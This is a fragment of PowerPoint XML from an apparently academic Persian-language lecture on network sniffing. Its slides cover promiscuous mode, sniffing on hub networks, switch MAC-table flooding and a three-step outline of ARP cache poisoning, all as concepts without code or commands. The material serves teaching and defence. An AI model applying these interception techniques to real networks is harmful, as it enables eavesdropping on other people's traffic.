            <a:xfrm flipV="1">
              <a:off x="1680" y="2880"/>
              <a:ext cx="0" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12307" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1488" y="2400"/>
              <a:ext cx="0" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12308" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="2400"/>
              <a:ext cx="0" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12309" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1056" y="2880"/>
              <a:ext cx="0" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12303" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="2209800"/>
            <a:ext cx="0" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="1752600"/>
            <a:ext cx="5240339" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" u="sng">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به طرف </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پايين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>رشد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميکند</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>, Motorola, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SPARC, MIPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اشاره گر پشته به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آخرين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>محل اشاره </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميکند</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21"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4</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موارد کاربرد شنود در شبکه هاي کامپيوتري</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>براي</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>کشف </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>مشکلات ارتباطي شبکه هاي کامپيوتري</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>تبديل ترافيک شبکه به متن قابل خواندن </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>آناليز کارايي شبکه به منظور کشف گلوگاه ها </a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>کشف نفوذ هاي احتمالي به شبکه از سوي نفوذ گران  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>واقعه نگاري از شبکه به منظور جلوگيري از اينکه نفوذگران به شبکه نفوذ کرده وردپاهاي خود را از بين ببرند .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>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229600" cy="914400"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چگونه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>امکان شنود ترافيک </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شبکه وجود دارد؟</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRP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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>پرتکل اترنت بر مبناي  مديريت اشتراک در شبکه هاي کامپيوتري طراحي شده است. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>اترنت فيلتري را طراحي کرده است که هر ماشين فقط ترافيک مربوط به آدرس فيزيکي خود را از روي شبکه بردارد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>يک برنامه شنود اين فيلتر را برداشته و سخت افزار اترنت را در حالت بي قيد (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Promiscuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>) قرار مي دهد. که در اين حالت کليه بسته هاي عبوري از شبکه را دريافت مي کند. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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848600" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شنود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شبکه هاي محلي مبتني بر هاب</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRP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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t> از آنجايي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>که بسته ها در هاب به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t>صورت پخشي براي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>همه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t>ارسال مي شوند بنابراين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>نفوذ گر قادر خواهد بود با </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t>نصب يک نرم افزار شنود روي يکي از گره ها (مثلا اسب تراواي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>آلوده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t>به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>) کليه ترافيک شبکه را شنود کند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شنود در شبکه هاي مبتني بر سوئيچ</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428596" y="1571612"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Switch jamming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> (اختلال در سوئيچ)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPct val="65000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="339966"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>در اين روش سوئيچ از حالت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bridge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>خارج شده و به حالت تکرار کننده در مي آيد. اين کار با سريز کردن جدول سوئيچ با آدرس هاي فيزيکي جعلي صورت مي گيرد .</a:t>
            </a:r>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ARP (Address Resolution Protocol)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ARP redirect (ARP cache poisoning)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" rtl="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0"/>
              <a:t>1. Broadcast an ARP request containing the victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0"/>
              <a:t>s IP address and this host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0"/>
              <a:t>s MAC address as the source (The victim can be a router)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" rtl="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0"/>
              <a:t>2. Others will believe that this host has the victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0"/>
              <a:t>s IP address, and send packets for the victim to this host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" rtl="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0"/>
              <a:t>3. This host should forward the packets to the victim.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4300" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596"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fa-IR" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
